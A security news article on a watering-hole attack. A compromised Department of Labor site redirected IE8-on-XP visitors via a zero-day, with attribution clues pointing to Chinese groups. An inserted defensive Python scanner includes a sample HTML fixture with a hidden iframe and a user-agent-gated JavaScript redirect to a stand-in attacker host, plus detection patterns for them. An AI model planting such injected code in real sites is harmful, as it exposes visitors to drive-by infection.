
Cyberattack highlights software update problem in large organizations

A recent cyberattack targeting U.S. government employees working with nuclear weapons illustrates the vulnerability of large organizations that struggle with deploying protective software upgrades.

The attackers, who compromised a Department of Labor website, exploited a previously unknown vulnerability, called a zero-day flaw, in Internet Explorer 8, commonly found on PCs running Windows XP. JavaScript injected into the site redirected visitors using IE8 on XP to a malicious website.

In choosing to go after federal agencies, the attackers understood that many government departments are still using outdated versions of Windows and IE, due to the huge expense of upgrading thousands of people to newer versions. Such migrations involve the difficult task of upgrading many other business applications to support the new OS.

“There’s a lot of government agencies, and commercial entities as well, that simply cannot upgrade to these latest versions,” Eddie Mitchell, security researcher for Invincea, said Monday. “They have internal applications, HR (human resource) applications, payroll applications and such that were designed explicitly to work with Internet Explorer 8, which is why these organizations are still vulnerable to attack.”

Researchers agree that the command-and-control (CC) servers in the latest attack, discovered last week, have attributes similar to those used in previous attacks originating from China.

FireEye reported that the host name of the CC servers in the latest attack included the phrase “microsoftUpdate,” which was also used in attacks over the last six months against the Council on Foreign Relations website and news sites in China visited by Chinese dissidents.


“I’m not going to be surprised if the attacks are originating from the same group,” Zheng Bu, senior director of research for FireEye, said.

FireEye and Invincea have not identified the culprits, but AlienVault reported that the malware is using the same protocol to communicate with the CC servers as the one used by a Chinese hacking group called Deep Panda. The group is known to attack a variety of U.S. entities, including the high-tech and defense industries and state and federal government agencies.

The pages compromised on the Labor Department website contained information that listed nuclear-related illnesses linked to Department of Energy facilities where employees are developing atomic weapons. Visitors were redirected to the malicious website unknowingly, since there was no obvious change in the browser.

That’s accomplished through the use of JavaScript and HTML inline frames. Known as iFrames, these elements are embedded in pages to load content from malicious sites without any visible change to the page. IFrames were the most commonly used exploit in Web-based attacks in the second half of last year, according to Microsoft’s latest Security Intelligence Report.
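The two page-level indicators described above, a hidden iframe pulling in a third-party page and a script that redirects only visitors whose browser identifies as IE8 on Windows XP, can be checked for on a site's own HTML. The scanner below is an added example written for this article, not code from the article, FireEye, Invincea or Microsoft; the sample page, the `attacker.example` host and the `www.dol.example` site host are constructed placeholders, and the user-agent strings it looks for are the standard IE8 (`MSIE 8`) and Windows XP (`Windows NT 5.1`) tokens.

```python
"""Flag hidden off-site iframes and user-agent-gated JavaScript redirects in a
page's HTML. Added example for the injection pattern the article describes."""
import re
from html.parser import HTMLParser

# Constructed sample page: one legitimate same-site iframe, one hidden iframe to
# another host, and a script that redirects only IE8-on-XP visitors.
SAMPLE_HTML = """
<html><body>
<h1>Compensation program: covered illnesses</h1>
<iframe src="/video-player.html" width="640" height="360"></iframe>
<iframe src="http://attacker.example/landing.html" width="0" height="0"
        style="visibility:hidden"></iframe>
<script>
var ua = navigator.userAgent;
if (ua.indexOf("MSIE 8") != -1 && ua.indexOf("Windows NT 5.1") != -1) {
    window.location = "http://attacker.example/landing.html";
}
</script>
</body></html>
"""

SITE_HOST = "www.dol.example"  # placeholder for the host whose pages are scanned

# Redirect sinks commonly assigned in injected scripts (assumption: these three cover
# the plain "location = url" form; other forms would need more patterns).
_REDIRECT_RE = re.compile(
    r'(?:window\.location|location\.href|document\.location)\s*=\s*["\']([^"\']+)["\']')
_UA_TOKENS = ("MSIE 8", "Windows NT 5.1")


def _is_hidden(attrs):
    """True if the frame is sized to 0/1 px or styled invisible."""
    width = attrs.get("width", "") or ""
    height = attrs.get("height", "") or ""
    style = (attrs.get("style", "") or "").replace(" ", "").lower()
    return (width in ("0", "1") or height in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


def _is_offsite(src, site_host):
    """True if src is an absolute URL whose host differs from the site's own."""
    m = re.match(r"^(?:https?:)?//([^/]+)", src or "")
    return bool(m) and m.group(1).lower() != site_host.lower()


class InjectionScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []        # list of (indicator, target_url)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src", "") or ""
            if _is_hidden(a) and _is_offsite(src, self.site_host):
                self.findings.append(("hidden-offsite-iframe", src))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive as CDATA; flag ones that branch on the user agent
        # for IE8/XP and assign a redirect sink.
        if not self._in_script or "navigator.userAgent" not in data:
            return
        if not all(tok in data for tok in _UA_TOKENS):
            return
        for target in _REDIRECT_RE.findall(data):
            self.findings.append(("ua-gated-redirect", target))


def scan_html(html, site_host=SITE_HOST):
    """Return the list of (indicator, url) findings for one HTML document."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for indicator, url in scan_html(SAMPLE_HTML):
        print(f"{indicator}: {url}")
```

Run against a crawl of the site's own pages, a non-empty result is a reason to diff the page against its source-controlled copy; a clean result is not proof of absence, since injected code can be obfuscated or served only to matching browsers.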

Makers of popular exploit kits available in the criminal underground, such as Blackhole and Cool, are expected to incorporate the latest zero-day vulnerability soon, Mitchell said.

“It would not surprise me in the least, based on what we’ve seen in the past, to see this exploit loaded [in kits] in the next day or two, a week at the most,” he said.

Indeed, FireEye reported finding nine other websites besides the Labor Department’s redirecting visitors to the same malicious site. Microsoft issued an alert last Friday notifying customers of the vulnerability. The company has not said when it would release a patch.

“We strongly encourage customers to follow the workarounds listed in the advisory while we continue working on a full update to address this issue,” said Dustin Childs, group manager for response communications for Microsoft Trustworthy Computing.

Read more about application security in CSOonline’s Application Security section.
